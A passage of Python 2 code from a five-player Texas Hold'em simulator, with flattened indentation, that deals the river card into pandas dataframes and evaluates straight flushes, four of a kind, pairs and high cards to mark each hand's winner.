list[3] or list[0] == list[4] or list[0] == list[5]):
TP5 = TP5 + 1
f5.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] ==
list[4] or list[1] == list[5]):
TP5 = TP5 + 1
f5.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f5.append(list[1])
if TP5 > 1:
f5 = np.sort(f5[::-1]).tolist()
a5.append(f5[0])
a5.append(f5[1])
Fin = Fin + 1
#Check for two pair
if Fin > 0:
print "Two pair"
b = max(max(a1),max(a2),max(a3),max(a4),max(a5))
if max(a1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif max(a2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif max(a3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif max(a4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif max(a5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
#Check for one pair
elif TP1+TP2+TP3+TP4+TP5 > 0:
print "One pair"
b = max(max(f1),max(f2),max(f3),max(f4),max(f5))
if max(f1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if max(f2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if max(f3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if max(f4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if max(f5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Find the high card
print "High Card"
winner = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3] )
if df1.iloc[i * 4 + k - 1, 1] == winner or df1.iloc[
i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner or df2.iloc[
i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner or df3.iloc[
i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner or df4.iloc[
i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner or df5.iloc[
i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
if k == 4:
#Create the River
df1.loc[i * 4 + k-1] = df1.loc[i * 4 + k - 2]
df2.loc[i * 4 + k - 1] = df2.loc[i * 4 + k - 2]
df3.loc[i * 4 + k - 1] = df3.loc[i * 4 + k - 2]
df4.loc[i * 4 + k - 1] = df4.loc[i * 4 + k - 2]
df5.loc[i * 4 + k - 1] = df5.loc[i * 4 + k - 2]
while x == 0:
print "Step 14"
# Generate 5th community card or the river
df1.iloc[i * 4 + k-1][12] = random.randrange(1, 5)
df1.iloc[i * 4 + k-1][13] = random.randrange(2, 15)
df2.iloc[i * 4 + k - 1][12] = df1.iloc[i * 4 + k - 1][12]
df2.iloc[i * 4 + k - 1][13] = df1.iloc[i * 4 + k - 1][13]
df3.iloc[i * 4 + k - 1][12] = df1.iloc[i * 4 + k - 1][12]
df3.iloc[i * 4 + k - 1][13] = df1.iloc[i * 4 + k - 1][13]
df4.iloc[i * 4 + k - 1][12] = df1.iloc[i * 4 + k - 1][12]
df4.iloc[i * 4 + k - 1][13] = df1.iloc[i * 4 + k - 1][13]
df5.iloc[i * 4 + k - 1][12] = df1.iloc[i * 4 + k - 1][12]
df5.iloc[i * 4 + k - 1][13] = df1.iloc[i * 4 + k - 1][13]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 10] and df1.iloc[i * 4 + k - 1, 13] ==
df1.iloc[i * 4 + k - 1, 11]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 8] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 9]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 6] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 7]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 4] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 5]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 1])\
or (df1.iloc[i * 4 + k - 1, 12] == df2.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df2.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 12] == df3.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df3.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 12] == df4.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df4.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 12] == df5.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df5.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 12] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 12] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 12] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 12] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
#Evaluate river round
list = [[-1, -1],
[-1, -1],
[-1, -1],
[-1, -1],
[-1, -1],
[-1, -1],
[-1, -1]]
df1.iloc[i * 4 + k - 1, 14] = 0
df2.iloc[i * 4 + k - 1, 14] = 0
df3.iloc[i * 4 + k - 1, 14] = 0
df4.iloc[i * 4 + k - 1, 14] = 0
df5.iloc[i * 4 + k - 1, 14] = 0
# Straight Flush Evaluation
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
#With Ace Low
list[0] = [df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 0]]
list[1] = [df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 2]]
list[2] = [df1.iloc[i * 4 + k - 1, 5], df1.iloc[i * 4 + k - 1, 4]]
list[3] = [df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 6]]
list[4] = [df1.iloc[i * 4 + k - 1, 9], df1.iloc[i * 4 + k - 1, 8]]
list[5] = [df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 10]]
list[6] = [df1.iloc[i * 4 + k - 1, 13], df1.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a1 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a1 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][0] and list[5][0]+1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and list[5][1] == list[6][1]:
a1 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 0]]
list[1] = [df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 2]]
list[2] = [df1.iloc[i * 4 + k - 1, 5], df1.iloc[i * 4 + k - 1, 4]]
list[3] = [df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 6]]
list[4] = [df1.iloc[i * 4 + k - 1, 9], df1.iloc[i * 4 + k - 1, 8]]
list[5] = [df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 10]]
list[6] = [df1.iloc[i * 4 + k - 1, 13], df1.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a1 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a1 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][0] and list[5][0]+1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and list[5][1] == list[6][1]:
a1 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P2 Evaluation
# With Ace Low
list[0] = [df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 0]]
list[1] = [df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 2]]
list[2] = [df2.iloc[i * 4 + k - 1, 5], df2.iloc[i * 4 + k - 1, 4]]
list[3] = [df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 6]]
list[4] = [df2.iloc[i * 4 + k - 1, 9], df2.iloc[i * 4 + k - 1, 8]]
list[5] = [df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 10]]
list[6] = [df2.iloc[i * 4 + k - 1, 13], df2.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a2 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a2 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a2 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 0]]
list[1] = [df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 2]]
list[2] = [df2.iloc[i * 4 + k - 1, 5], df2.iloc[i * 4 + k - 1, 4]]
list[3] = [df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 6]]
list[4] = [df2.iloc[i * 4 + k - 1, 9], df2.iloc[i * 4 + k - 1, 8]]
list[5] = [df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 10]]
list[6] = [df2.iloc[i * 4 + k - 1, 13], df2.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a2 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a2 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a2 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P3 Evaluation
# With Ace Low
list[0] = [df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 0]]
list[1] = [df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 2]]
list[2] = [df3.iloc[i * 4 + k - 1, 5], df3.iloc[i * 4 + k - 1, 4]]
list[3] = [df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 6]]
list[4] = [df3.iloc[i * 4 + k - 1, 9], df3.iloc[i * 4 + k - 1, 8]]
list[5] = [df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 10]]
list[6] = [df3.iloc[i * 4 + k - 1, 13], df3.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a3 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a3 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a3 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 0]]
list[1] = [df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 2]]
list[2] = [df3.iloc[i * 4 + k - 1, 5], df3.iloc[i * 4 + k - 1, 4]]
list[3] = [df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 6]]
list[4] = [df3.iloc[i * 4 + k - 1, 9], df3.iloc[i * 4 + k - 1, 8]]
list[5] = [df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 10]]
list[6] = [df3.iloc[i * 4 + k - 1, 13], df3.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a3 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a3 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a3 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P4 Evaluation
# With Ace Low
list[0] = [df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 0]]
list[1] = [df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 2]]
list[2] = [df4.iloc[i * 4 + k - 1, 5], df4.iloc[i * 4 + k - 1, 4]]
list[3] = [df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 6]]
list[4] = [df4.iloc[i * 4 + k - 1, 9], df4.iloc[i * 4 + k - 1, 8]]
list[5] = [df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 10]]
list[6] = [df4.iloc[i * 4 + k - 1, 13], df4.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a4 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a4 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a4 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 0]]
list[1] = [df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 2]]
list[2] = [df4.iloc[i * 4 + k - 1, 5], df4.iloc[i * 4 + k - 1, 4]]
list[3] = [df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 6]]
list[4] = [df4.iloc[i * 4 + k - 1, 9], df4.iloc[i * 4 + k - 1, 8]]
list[5] = [df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 10]]
list[6] = [df4.iloc[i * 4 + k - 1, 13], df4.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a4 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a4 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a4 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P5 Evaluation
# With Ace Low
list[0] = [df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 0]]
list[1] = [df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 2]]
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list[6] = [df5.iloc[i * 4 + k - 1, 13], df5.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a5 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a5 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a5 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 0]]
list[1] = [df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 2]]
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list[6] = [df5.iloc[i * 4 + k - 1, 13], df5.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a5 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a5 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a5 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# Straight Flush Evaluation in community cards
master = 0
# With Ace Low
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list[6] = [df5.iloc[i * 4 + k - 1, 13], df5.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
master = 1
# With Ace High
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list[6] = [df5.iloc[i * 4 + k - 1, 13], df5.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
master = 1
# Check for Straight flush
if master == 1:
print "Royal Flush in community cards"
elif (SF > 0):
print "Straight Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for four of a kind
FK = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a1 = m
break
if count == 4:
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a2 = m
break
if count == 4:
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a3 = m
break
if count == 4:
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
